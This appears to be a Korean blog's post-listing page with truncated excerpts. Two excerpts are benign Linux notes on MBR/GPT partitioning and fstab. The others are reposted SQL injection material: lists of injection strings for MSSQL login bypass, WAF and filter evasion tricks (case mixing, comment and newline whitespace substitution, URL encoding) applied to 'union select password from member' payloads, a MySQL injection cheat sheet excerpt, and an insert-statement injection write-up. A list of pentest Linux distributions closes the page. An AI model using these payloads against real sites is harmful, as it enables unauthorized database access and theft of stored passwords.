행복의 조건 * 라니안

PC BIOS 기반에서 MS-DOS 시절부터 일반적인 윈도우, 예전 버젼 리눅스 등에서 사용하던 방식이 MBR based partition 입니다. 오랜 역사를 가지고 있지요. 이 오래된 MBR partition table 의 문제를 해결하고자 나온 것이, EFI 시스템에서 주로 사용하는 GUID partition table (GPT) 입니다. 일단 두 파티셔닝 방식의 차이를 표를 통해 보겠습니다. 일단 네줄 요약: 1. GPT 가 나중에 나왔으니, 당연히 기능은 MBR보다 다 좋습니다. 윈도 쓸 일이 없다면 GPT 쓰시면 됩니다. 2. 하지만 결정적인 문제는 윈도우에서 GPT가 부팅디바이스로 원래 지원이 안된다는겁니다. 3. 그래도 hybrid MBR 을 사용하면 윈도 설치 및 활용이 가능합니다. 4...

fstab(File System Table) 각각의 파일 시스템 정보를 담아두는 파일. 부팅시 여기에 적혀있는 모든 파일 시스템을 자동으로 마운트하게 되어 있다. $vi /etc/fstab 각 항목은 의미와 용도는 아래와 같다. 1. spec : 마운트 할 장치나 원격 파일 시스템 등을 설정. ex) UUID, /dev/cdrom, /dev/sdb7, knuth.aeb.nl:/ 2. file : 파일 시스템을 마운트할 위치를 설정. swap 파티션일 경우는 'none'이라고 적는다. ex) /home 3. vfstype : 파일 시스템의 타입을 설정. ex) ext2, iso9660, msdos, nfs, autofs 4. mntops : 파일 시스템에 마운트 할 옵션을 설정. - defaults : r..

http://cafe.naver.com/hackersmaster/351 대상 DB서버: SQL SERVER(MSSQL) ######################################################## 인젝션 가능 파일 찾기######################################################http://xxx/tmp/mypc.asp?id=1110.인젝션 스트링 종류str 1) ' or''=' 2) ' or 1=1-- 3) ' or 'a'='a-- 4) 'or'='or' 5) " or 1=1-- 6) " or "a"="a 7) ') or ('a'='a 8) ") or ("a"="a 9) ' and [??] and ''=' 10) ' and [??] and '..

ireoa 님의 블로그에서 퍼왔습니다. 1) 대소문자 변형 union select password from member where id='ireoa'-- UnION seLEct password ForM member WhErE id='ireoa'-- 2) 공백 우회 /**/ %0a %09 () 3)URL Encoding 3) = 우회 union select password from member where username = 'ireoa'-- union select password from member where username like 'ireoa'-- 4)URL Encoding '%2f%2a*/union%2f%2a*/select%2f%2a*/password%2f%2a*/form%2f%2a*/member%..

출처 : http://blog.epzsecurity.com/2012/08/mysql-injection-cheet-sheet-including.html MySQL Injection Cheat SheetComments:Comments are very useful and can sometimes even help bypass certain WAF procedures. These comments are the ones that I have picked up over the last few years: -- (Simple Comment)--+- (String Based Comment)/* (Multiple Line Comment)# (Single Line Comment)/*!*/ (Bypasses certain ..

본 글은 작성자:Khuti (http://khuti.tistory.com/6) 글 스크랩 자료 입니다. SQL 인젝션 우회 패턴에 대해서 종합 정리 및 지속적인 업데이트를 할려고 한다. 이하 내용은 본인이 직접 연구&학습&뻘짓&노가다 한 내용이다. 다양한 우회 패턴이 더 있지만.. 간단하게 일부만 정리.. 먼저,,,,,,,,, 우회 패턴엔 크게 3가지 분류가 있을 수 있다. - 1) 네트웍 특성을 이용한 우회 패턴 - 2) SQL의 특성을 이용한 우회 패턴 - 3) 애플리케이션의 잘못된 필터링으로 인한 우회 패턴 요즘 같은 세상엔 당연히 SQL 인젝션은 기본적으로 막혀 있을거라 생각한다면... No!! 시대가 변하고 보안 이슈가 늘어나도!!! 사람의 습관은 크게 변하지 않는 법!! 남의 일이라 생각하는 ..

출처 : http://k3170makan.blogspot.kr/2012/01/injecting-insert-statements-mysql-error.html Exploring my options One night while banging injection payloads into a random page I suddenly found myself in an insert statement! This is when I got the idea to use insert statements for MySQL error based injection vectors. Some people might be wondering why on earth would one would want to inject an insert?..

WEAKERTHAN - http://weaknetlabs.com/ BackTrack - http://www.backtrack-linux.org/ NETSECLOS - http://netsecl.com/download Wifiway - http://www.wifislax.com/ PHLAK - http://sourceforge.net/projects/phlakproject/ slitaz - http://www.slitaz.org/ NodeZero - http://netinfinity.org/ REMnux - http://sourceforge.net/projects/remnux/ Security Onion - http://securityonion.blogspot.com/ OWASP livecd - http:..